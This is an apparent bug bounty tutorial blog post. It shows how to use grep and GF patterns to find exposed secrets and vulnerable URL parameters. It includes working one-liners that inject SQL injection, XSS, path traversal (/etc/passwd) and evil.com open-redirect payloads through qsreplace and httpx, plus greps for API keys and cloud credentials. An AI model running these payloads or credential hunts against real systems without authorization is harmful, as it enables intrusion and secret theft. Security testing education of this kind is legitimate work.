$50–$200 Low Hanging Bugs/Fruit Automation | Bug Automation Part 1

Practical Techniques, Tips and Tricks to Find Low Hanging Bugs

Friend Link | Free Link

Hi geeks, it4chis3c (Twitter) came-up with another bounty earning write-up in the Bug Bounty Hunting Series:

It4chis3c

Bug Bounty Hunting Series

View list

30 stories

Credit: DALL-E

Why Grep and GF-Patterns?

Manual code/endpoint analysis is time-consuming. Grep (Global Regular Expression Print) and GF (a tool by @tomnomnom that wraps grep with vulnerability-specific patterns) automate the hunt for low-hanging fruit. They excel at:

• Rapidly sifting through massive codebases, logs, or URL lists.
• Identifying high-risk patterns (e.g., hardcoded secrets, SSRF parameters).
• Prioritizing targets for deeper exploitation.

Grep Extensions: Flags That Unlock Precision

Grep’s power lies in its flags. Here’s how to weaponize them:

Essential Flags for Bug Bounties

1. -i: Case-insensitive search (e.g., api_key vs API_KEY).
2. -r: Recursive directory search.
3. -E: Enable extended regex (supports |, +, {}).
4. -n: Show line numbers (critical for reporting).
5. -o: Print only matched text (ideal for piping to other tools).
6. -v: Invert match (exclude noise like example.com).
7. --include/--exclude: Target specific file types (e.g., --include=*.js).

Key Assets to Target with Grep/GF

1. JavaScript Files

Why: JS files leak API keys, endpoints, and debug parameters.
Where to Find:

• /static/js/, /assets/, /dist/ directories
• URLs ending with .js (e.g., https://example.com/app.min.js)

Commands:

# Find API keys in JS files:  
grep -riE 'api_?key|token|secret' /path/to/downloaded/js/files/ --include=*.js  

# Find debug flags (like 'debug=true' in code logic):  
grep -ri -C 3 'debug=true' /path/to/js/files/  

# Use GF to hunt for endpoints:  
cat example_js_files.txt | gf endpoints | httpx -silent  

2. Subdomains (e.g., api.example.com, dev.example.com)

Why: Subdomains often have weaker security controls.
How to Gather:

• Use subfinder, amass, or assetfinder to enumerate subdomains.
• Fetch historical URLs with waybackurls or gau.

Commands:

# Grep for AWS keys across all subdomains' code:  
grep -riE 'AKIA[0-9A-Z]{16}' /path/to/subdomain/files/ --exclude-dir=.git  

# Find SSRF-prone parameters in subdomain URLs:  
cat subdomain_urls.txt | gf ssrf | httpx -silent -fr  

3. API Endpoints (e.g., /api/v1/users, /graphql)

Why: APIs are goldmines for IDOR, SQLi, and auth flaws.
Where to Find:

• Burp Suite logs, katana/gau output, or postman collections.

Commands:

# Hunt for UUIDs in API responses (IDOR candidates):  
grep -riE '[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89ab][a-f0-9]{3}-[a-f0-9]{12}' /api/logs/  

# GF + SQLi pattern testing:  
cat api_endpoints.txt | gf sqli | qsreplace "') OR 1=1--" | httpx -ms "database error"  

4. Configuration Files

Why: .env, config.php, and *.yaml files often contain secrets.
Where to Find:

• Web root directories (/var/www/, /app/config/).
• Accidental public exposure (e.g., https://example.com/.env).

Commands:

# Hunt for database credentials:  
grep -riE 'DB_(USER|PASSWORD|HOST)=[^\n]+' /app/ --include=.env  

# Find cloud credentials in YAML files:  
grep -riE 'aws_access_key_id|s3_bucket' --include=*.yaml /config/  

5. Open Redirect & SSRF Parameters

Why: Parameters like ?url= or ?next= are low-hanging fruit.
How to Find:

• Extract URLs from source code, HAR files, or proxy logs.

Commands:

# GF for open redirects:  
cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -fr -mr "evil.com"  

# Grep for URL parameters in source code:  
grep -ri 'window.location.href' /app/ --include=*.js  

Final Tip: Always exclude noisy directories for faster results:

grep -riE 'password' /app/ --exclude-dir={node_modules,.git,dist}  

GF-Patterns: The Art of Targeting Vulnerable Links

GF (github.com/tomnomnom/gf) pre-packages regex patterns for vulnerabilities like SSRF, SQLi, and IDOR.

Top GF Patterns and Usage

SQL Injection:

cat urls.txt | gf sqli | httpx -silent  

Looks for parameters like ?id=1 or &user=*.

2. SSRF:

cat urls.txt | gf ssrf | tee ssrf_candidates.txt  

Targets url=, callback=, or dest= parameters.

3. XSS (Cross-Site Scripting)

Pattern: Targets parameters like ?search=, q=, or name=.
Command:

cat urls.txt | gf xss | qsreplace '"><svg/onload=alert(1)>' | httpx -silent -ms 200  

Why:

• GF’s xss pattern filters URLs with reflection points (e.g., ?error=<input>).
• qsreplace injects payloads while preserving URL structure.

4. LFI (Local File Inclusion)

Pattern: Hunts for file=, page=, or include= parameters.
Command:

cat urls.txt | gf lfi | qsreplace '../../../../etc/passwd' | httpx -sr -mr 'root:x:0'  

Why:

• GF’s lfi pattern identifies path traversal candidates.
• -sr (show response) and -mr (match regex) in httpx confirm file leaks.

Pro Tip:

• For Windows targets, test ..%5C..%5Cwindows%5Cwin.ini (URL-encoded backslashes).

5. JWT Token Exposure

Pattern: Finds Authorization: Bearer headers or token= parameters.
Command:

cat urls.txt | gf jwt | httpx -headers 'Cookie: debug=1' -sv | tee jwt_endpoints.txt  

Why:

• JWTs in URLs (e.g., ?token=eyJ...) are often misconfigured.
• Add -headers to bypass weak auth checks during testing.

6. GraphQL Introspection (Bonus)

Pattern: Targets /graphql endpoints with introspection queries.
Command:

cat urls.txt | gf graphql | httpx -path '/graphql?query={__schema{types{name}}}' -mr '__schema'  

Why:

• Introspection leaks API schemas, exposing hidden mutations/queries.
• Use -path in httpx to auto-append dangerous queries.

# Secret Tip: Custom GF Patterns

Add your own patterns to ~/.gf/. Example ssrf.json:

{  
  "flags": "-iE",  
  "pattern": "\\b(url|dest|redirect)=[^&]*"  
}  

Vulnerable Links: From Grep to Exploitation

Workflow

1. Harvest URLs: Use tools like waybackurls, gau, or katana. (Read my URL Discovery write-up)
2. Filter with GF:

cat urls.txt | gf xss | qsreplace '"><svg/onload=confirm(1)>' | httpx -mc 200  

3. Contextual Grepping:

• Search for openRedirect in JavaScript:

grep -riE 'window\.location|document\.location' --include=*.js  

Find insecure deserialization:

grep -ri 'ObjectInputStream' /app/  

Mistakes to Avoid

• Over-reliance: Grep/GF output requires manual verification.
• Regex Gaps: Complex vulnerabilities (e.g., business logic) need human insight.
• Noise: Always exclude directories like node_modules/ with --exclude-dir.

Final Pro Tip: Update GF-patterns weekly. The bug bounty landscape evolves fast — so should your regex.

URL Discovery: Hunt Where Others Aren’t Hunting | Recon Part 8

How to Uncover Hidden Attack Surfaces? Recon part 6

Discover Secret/Hidden Directories & Content | Recon Part 7

Choosing Your First Program in Bug Bounties: A Beginner’s Guide

I look forward to sharing what I’ve learned while exploring the ever-evolving world of cybersecurity and bug bounties. Let’s hunt some bugs!

Thank you for reading the blog!!! Do Follow and Comment on what specific type of write-up you want the next??

You can also follow me on Twitter & LinkedIn for more such tips & tricks.

Follow & subscribe for daily write-up updates via mail on Medium

Buy Me A Coffee